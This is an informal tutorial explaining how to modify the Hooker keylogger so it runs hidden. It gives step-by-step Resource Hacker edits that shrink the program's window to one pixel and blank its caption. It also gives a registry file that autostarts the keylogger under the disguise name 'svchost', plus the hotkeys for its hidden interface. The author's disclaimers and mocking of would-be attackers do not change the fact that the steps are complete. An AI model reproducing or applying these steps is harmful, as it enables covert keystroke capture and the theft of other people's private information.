How to Transform Hooker Public Version in Somthing Near the Private Version

The Hooker (comes from Hooking to a proces feature :P ) is a keylogger app that is nice, low profile, it dosent install "features" that are used by outher ppl. But yes, it can be used in a bad and ilegal way. It is up to you how you use it. I converted from one version to another just for the chalange. The person that made this appication is Denis Kozlov ( http://www.den4b.com ), and he dosent offer a "PRIVATE VERSION" anymore. The thing that catch my attention whas that he needed to compile from the source a private version for each user that asked for one. ?!?! 

I made a nice a easy, ( to be read as Quick n' Dirty ) solution to his problem and for anyone that needed that app.

Hooker 2.65 Beta 11 is the last version now ( http://www.den4b.com/?x=downloads ) get the zip version
Resource Hacker 3.6.0, or another resource editor ( http://www.angusj.com/resourcehacker/ )

Unzip it in a folder of your choice.

If you ever used delphi or pascal then you know how to edit a text form aka TFORM. ;)

1. Open Resoruce Hacker and from File menu select Open and select the hooker.exe

2. Go to "RCData" in Resource Hacker tree there choose "TFORM_HOOKER" and "0"
     Change the folowing :

Left = 447 with Left = 0
Top = 308 with Top = 0
Width = 354 with Width = 1
Height = 331 with Height = 1
Capiton = 'Hooker' with Capiton = '' <------------ This is not a double quota is single used 2 times ( NOT " but ' )

After the capiton line add a new line with the folowing content :

BorderStyle = bsDialog

then click compile script and save it.

See the first 2 images. The highlighted in the second picture is the changed resource.

In the 3rd picture you see the sample configuration file. You can easly configure the application without the need of a interface.
For autorun you need to put the exe in the registry under run key.

This is for autorun on:
------------------------------
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\\Documents and Settings\\Administrator\\Desktop\\hooker-beta\\Hooker.exe"
------------------------------

This is for delete the autorun feature from the registry:
------------------------------
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"=-
------------------------------

Some more info :

Press  CTRL+ALT+SHIFT+ (F12 or F11 or F10 or F9) to activate the hidden interface (you will see still nothing, only a change of focus from the curent window) then by pressing ALT+F4 you can close the aplication.

Now for GI Joe that asks: What have i done until now ?
Here is the answer : You made the applications main interface and all his child interfaces be dispayed in the top left corner and her size is 1px height and 1px width. Thats tiny and u cant see it :D

1. If you plan to use this as a way to steal info from som1s PC then you are no "1337 uber-haxor", you are just a sad script kid, get my     2 penny advice : THIS IS JUST A TOY, PRO PPL USE A APP THAT RUNS IN RING 0 OR A NICE ROOTKIT THAT PATCHES ALL FILES   B4 IT BOOTS IN WINDOWS. ANY1 THAT STILL HAS 1 SINGLE NEURON LEFT WILL SEE A NEW PROCESS RUNNING AND   ANYTHING THAT USE A TECHNOLOGY THAT MONITORS THE PROGRAMS IN WHAT THEY DO AND IF THE SCORE MATCHES IT WILL TRIGGER A ALERT. DONT USE IT !
2. I WILL NOT PUT A MODIFYED VERSION OF THE ORIGINAL EXE UP, YOU CAN STILL MODIFY IT HOW YOU WILL STILL YOU SHUD NOT DISTRIBUTE IT.
3. This whas fun for me to show you how easly can somthing that is "unchangable" be changed, and not with some exotic tools but with a simple resource editor and some minimal knowledge of TFORMS ;)

BTW THE MOD WORKS ON ANYTHING THAT HAS A TFORM RESOURCE, you just need too locate the interface you wanna mod.